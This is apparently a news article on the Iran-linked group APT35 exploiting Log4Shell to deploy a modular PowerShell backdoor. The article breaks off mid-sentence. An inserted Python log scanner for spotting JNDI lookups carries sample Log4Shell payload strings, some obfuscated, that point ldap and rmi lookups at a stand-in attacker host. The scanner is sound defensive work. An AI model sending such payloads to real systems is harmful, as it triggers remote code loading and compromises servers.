Hackers are using the Log4j flaw to deliver this new 'modular' backdoor

The Iran-backed hacking group APT35, which Microsoft tracks as Phosphorus, is using the Log4j vulnerability (Log4Shell, CVE-2021-44228) to distribute a new modular PowerShell toolkit, according to security firm Check Point. 

APT35 is one of several state-backed hacking groups known to have been developing tools to exploit public-facing Java applications that use vulnerable versions of the Log4j logging library.


Microsoft, which tracks the group as Phosphorus and has called it out for increasingly using ransomware in attacks, found that the group had operationalized a Log4j exploit for future campaigns less than a week after Log4Shell’s December 9 disclosure. 


According to Check Point’s follow-up analysis, APT35’s Log4j work was sloppy and “obviously rushed”: it used a basic, publicly available JNDI exploit kit (since removed from GitHub) for attacks that were easy to detect and attribute. 
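Attacks built on off-the-shelf JNDI exploit kits are “easy to detect” largely because the injected `${jndi:...}` lookup lands in whatever the target logs, typically the User-Agent or query string of a web request. The scanner below is an added example (not code from the article, Check Point or Microsoft) showing how to hunt for those lookups in access logs, including the two most common obfuscation forms that hide the literal string `jndi` behind nested `${lower:...}` and `${::-x}` lookups. The log lines, the IP addresses and the `attacker.example` host are constructed for the example; the resolution rules cover only the `lower`, `upper` and default-value (`:-`) lookups, not every variant seen in the wild.

```python
import re
from typing import List, Tuple

# Constructed sample web-server access log lines (assumption: not taken from the
# article or from Check Point's report). Lines 2-4 carry a Log4Shell-style JNDI
# lookup in the User-Agent or query string, two of them obfuscated with nested
# lookups; line 5 carries a harmless, non-JNDI lookup that must not be flagged.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:01:04 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://attacker.example/b} HTTP/1.1" 400 0 "-" "curl/7.79.1"',
    '203.0.113.9 - - [10/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '198.51.100.7 - - [10/Dec/2021:10:02:00 +0000] "GET /api?q=${date:yyyy} HTTP/1.1" 200 10 "-" "-"',
]

# An innermost ${...} lookup: a body containing no nested braces or dollar signs.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalization; captures the scheme (ldap, rmi, ...) and target.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^}]*)\}", re.IGNORECASE)


def _resolve(match: "re.Match") -> str:
    """Evaluate one innermost lookup the way Log4j 2.x evaluates the obfuscation
    forms this example covers; JNDI and unknown lookups are left untouched."""
    body = match.group(1)
    key = body.split(":", 1)[0].strip().lower()
    if key == "jndi":
        return match.group(0)            # keep it for the detector, never evaluate it
    if key in ("lower", "upper"):
        arg = body.split(":", 1)[1]
        return arg.lower() if key == "lower" else arg.upper()
    if ":-" in body:
        # ${name:-default} and the bare ${::-x} form: an unset lookup yields its default
        return body.split(":-", 1)[1]
    return match.group(0)                # e.g. ${date:yyyy}: not modelled here, leave as-is


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Repeatedly resolve innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        resolved = _INNERMOST.sub(_resolve, text)
        if resolved == text:
            return resolved
        text = resolved
    return text


def find_jndi_lookups(line: str) -> List[Tuple[str, str]]:
    """Return (scheme, target) for every JNDI lookup in one line, obfuscated or not."""
    normalized = normalize_lookups(line)
    return [(m.group(1).lower(), m.group(2)) for m in _JNDI.finditer(normalized)]


def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Scan access-log lines; return (line_number, scheme, target) for each hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for scheme, target in find_jndi_lookups(line):
            hits.append((number, scheme, target))
    return hits


if __name__ == "__main__":
    for number, scheme, target in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number}: JNDI lookup via {scheme} -> {target}")
```

Normalizing before matching is what makes the difference: a plain `jndi` substring search misses lines 3 and 4 entirely, while the resolved form of both is an ordinary `${jndi:...}` lookup. Attackers layer further tricks (`${env:X:-j}`, `${sys:...}`, URL-encoding of the payload, lookups split across headers), so treat this as a hunting aid for logs you already have, not as a substitute for upgrading Log4j to a fixed release.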

After exploiting Log4Shell on public-facing systems, the group deploys what Check Point describes as ‘a PowerShell-based modular backdoor’ for persistence, communication with a command and control (C&C) server, and execution of commands and additional modules. 

The main module of the attacker’s PowerShell framework validates network connections, enumerates characteristics about a compromised system, retrieves the C&C domain from

Read More: https://www.zdnet.com/article/hackers-are-using-the-log4j-flaw-to-deliver-this-new-modular-backdoor/#ftag=RSSbaffb68